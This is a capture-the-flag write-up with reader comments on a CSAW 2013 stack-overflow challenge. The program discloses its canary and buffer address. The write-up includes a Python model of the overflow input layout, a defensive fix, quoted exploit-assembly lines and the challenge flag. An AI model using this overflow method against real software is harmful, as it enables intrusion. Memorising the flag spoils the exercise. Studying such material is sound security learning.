Credit to Ryan
The first thing we did for this challenge was to
look at the program headers:
From the headers we can see that the stack is given read, write, and execute
permissions. Therefore, assuming the stack has enough space and we can overflow
the buffer, we should be able to place and execute shellcode on the stack.
Looking at the assembly in IDA Pro we see a few interesting lines.
From the assembly we can calculate what the stack
will look like at run time:
As we can see from the assembly, the program is going to do the following:
1. Create a random canary value and save it into VAR_C
2. Send the address that points to the top of BUF
3. Send the canary value
4. Send the following string: “Welcome to CSAW CTF. Exploitation 2 will be a little harder this year. Insert your exploit here:”
5. Receive 4096 bytes and store them in BUF
6. If the canary value has not been changed, return; else exit the program
So the program is reading up to 4096 bytes into a 2048-byte buffer. We have a
known address that points to the top of the buffer and we have the canary
value. So we need to write an exploit program that will send the shellcode +
canary value + buf address to get the flag.
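To make the frame layout concrete, here is an added example (not the writeup's solution code) that models the frame the assembly describes and shows two things: the canary check passes only because the program hands the canary to the client, and bounding the receive to the buffer size stops the input from ever reaching the canary or the saved return address. The offsets are assumptions: VAR_C is taken to be IDA's name for ebp-0xC, and BUF is assumed to start at ebp-0x80C so that its 2048 bytes end exactly at the canary slot; the canary and address values are constructed.

```python
# Added example (not the original solution code): a byte-level model of the
# stack frame described in the writeup. Assumptions: VAR_C == [ebp-0xC]
# (IDA naming) and BUF == [ebp-0x80C]; all concrete values are constructed.
import struct

BUF_SIZE = 2048                    # buffer size stated in the writeup
READ_SIZE = 4096                   # bytes the program receives (writeup)
CANARY_OFF = 0xC                   # assumption: VAR_C == [ebp-0xC]
BUF_OFF = BUF_SIZE + CANARY_OFF    # assumption: BUF == [ebp-0x80C]
FRAME_SIZE = BUF_OFF + 8           # through saved ebp (4) + return address (4)
# Bytes between the end of the 4-byte canary (ebp-0x8) and the return address
# (ebp+0x4): 8 bytes of other locals plus the 4-byte saved ebp == 12.
FILLER = CANARY_OFF


class Frame:
    """Model of the function's frame: index 0 is the first byte of BUF."""

    def __init__(self, canary, saved_ebp, ret_addr):
        self.canary = canary
        self.mem = bytearray(FRAME_SIZE)
        self._put(BUF_OFF - CANARY_OFF, canary)   # VAR_C
        self._put(BUF_OFF, saved_ebp)             # saved ebp
        self._put(BUF_OFF + 4, ret_addr)          # return address

    def _put(self, off, value):
        self.mem[off:off + 4] = struct.pack('<I', value)

    def _get(self, off):
        return struct.unpack('<I', self.mem[off:off + 4])[0]

    def receive(self, data, limit):
        """Copy up to `limit` bytes into BUF. Writing past BUF is allowed
        (that is the bug); writes past the frame are ignored by the model."""
        n = min(len(data), limit, FRAME_SIZE)
        self.mem[:n] = data[:n]

    def canary_intact(self):
        return self._get(BUF_OFF - CANARY_OFF) == self.canary

    def return_address(self):
        return self._get(BUF_OFF + 4)


def layout(canary, buf_address, body):
    """The input shape the writeup describes: body padded to the buffer size,
    the canary the program sent, filler up to the return-address slot, then
    the address of BUF so that `ret` lands at the start of the buffer."""
    assert len(body) <= BUF_SIZE
    return (body.ljust(BUF_SIZE, b'\x90')
            + struct.pack('<I', canary)
            + b'B' * FILLER
            + struct.pack('<I', buf_address))


def run(data, canary, buf_address, read_limit=READ_SIZE,
        saved_ebp=0xBFFFF0F8, ret_addr=0x08048500):
    """Feed `data` to a fresh frame; return (canary check passed, ret)."""
    frame = Frame(canary, saved_ebp, ret_addr)
    frame.receive(data, read_limit)
    return frame.canary_intact(), frame.return_address()


if __name__ == '__main__':
    CANARY, BUF_ADDR = 0x1234ABCD, 0xBFFFE7EC        # constructed values
    data = layout(CANARY, BUF_ADDR, b'\x90' * 16)     # 2068 bytes, under 4096
    ok, ret = run(data, CANARY, BUF_ADDR)
    print('known canary, 4096-byte read :', ok, hex(ret))   # True 0xbfffe7ec
    ok, ret = run(layout(CANARY ^ 1, BUF_ADDR, b''), CANARY, BUF_ADDR)
    print('wrong canary, 4096-byte read :', ok, hex(ret))   # False ...
    ok, ret = run(data, CANARY, BUF_ADDR, read_limit=BUF_SIZE)
    print('known canary, 2048-byte read :', ok, hex(ret))   # True 0x8048500
```

The third run is the fix a defender would make: once the receive is bounded to BUF_SIZE, the same input leaves the canary and the return address untouched, whereas the canary alone buys nothing once the program has disclosed it.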
Flag = 53666e040caa855a9b27194c82a26366
Link to solution code: https://github.com/IAryan/CTFSolutions/tree/master/CSAW/2013/Exploit_200
key{53666e040caa855a9b27194c82a26366}
Hello, I am new to exploit tasks. I tried to solve this challenge, and my exploit code works excellently on my local computer and binds a shell to 127.0.0.1 port 11111. But when I sent the code to the remote server, my code did not work.
I am trying to understand what is wrong.
I got shellcodes from http://shell-storm.org/ instead of developing my own.
I tried all the TCP shellcodes; most of them work correctly on my local computer but do not work on the remote server.
Do you use your own developed shellcode?
The given ELF file is x86 32-bit; my local computer is Ubuntu 32-bit.
I think the server OS should be compatible.
Also I read your python file and saw this string:
# Create NOP sled
nop_sled = '\x90' * (BUFF_SIZE - len(shellcode) - len(PAD) )
# Exploit to send to server
exploit = nop_sled + shellcode + PAD + canary + filler + buf_address
Why do you add the NOP string?
My code was like:
exploit = shellcode + CalculatedPadding + canary + 12bytepadding + buf_address
After the ret instruction, EIP is at the start of the shellcode, so why do you add additional padding with NOPs?
Why problem make when you no problem have you don't want to make.
My main question is:
Why do you add a NOP sled?
# Exploit to send to server
exploit = nop_sled + shellcode + PAD + canary + filler + buf_address
After the ret instruction, EIP is at the start of the shellcode, so why do you add additional padding with NOPs?
Hello, I don't know if this blog is still alive; however, I want to know why there is a 12-byte padding after the canary (before the ret address). Why is that? Can anyone please explain? Thanks.